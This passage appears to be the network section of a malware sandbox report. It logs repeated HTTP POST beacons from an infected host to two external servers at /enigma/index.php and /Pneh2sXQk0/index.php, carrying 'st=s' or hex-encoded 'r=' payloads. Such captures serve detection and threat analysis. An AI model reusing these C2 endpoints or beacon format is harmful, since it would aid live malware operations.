                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:37.017410040 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1227 | 192.168.2.5 | 51081 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:37.040606976 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:37.288063049 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1228 | 192.168.2.5 | 51082 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:37.376327038 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:37.622548103 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1229 | 192.168.2.5 | 51083 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:37.538708925 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:37.788729906 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1230 | 192.168.2.5 | 51084 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:37.884143114 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:38.139626026 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1231 | 192.168.2.5 | 51085 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:38.142107964 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:38.385305882 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1232        192.168.2.5  51086        193.233.132.56   80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:35:38.482996941 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:35:38.730781078 CEST  219                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1233        192.168.2.5  51087        193.233.132.167  80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:35:38.633083105 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:38.888719082 CEST  196                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1234        192.168.2.5  51088        193.233.132.56   80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:35:38.979229927 CEST  312                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:39.228060007 CEST  196                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1235        192.168.2.5  51089        193.233.132.167  80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:35:39.240979910 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:35:39.486638069 CEST  197                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1236        192.168.2.5  51090        193.233.132.56   80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:35:39.565763950 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:35:39.806438923 CEST  219                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1237        192.168.2.5  51091        193.233.132.167  80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:35:39.739773035 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:39.988127947 CEST  196                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1238 | 192.168.2.5 | 51092 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:40.054984093 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:40.298554897 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1239 | 192.168.2.5 | 51093 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:40.339138985 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:40.590775967 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1240 | 192.168.2.5 | 51094 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:40.641285896 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:40.879576921 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1241 | 192.168.2.5 | 51095 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:40.844264030 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:41.097969055 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1242 | 192.168.2.5 | 51096 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:41.132138968 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:41.384892941 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1243 | 192.168.2.5 | 51097 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:41.444936037 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:41.689177990 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1244        192.168.2.5  51098        193.233.132.56   80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:35:41.718980074 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:41.957983017 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1245        192.168.2.5  51099        193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:35:41.940107107 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:42.188263893 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1246        192.168.2.5  51100        193.233.132.56   80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:35:42.201462984 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:42.446005106 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1247        192.168.2.5  51101        193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:35:42.541807890 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:42.783881903 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1248        192.168.2.5  51102        193.233.132.56   80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:35:42.793826103 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
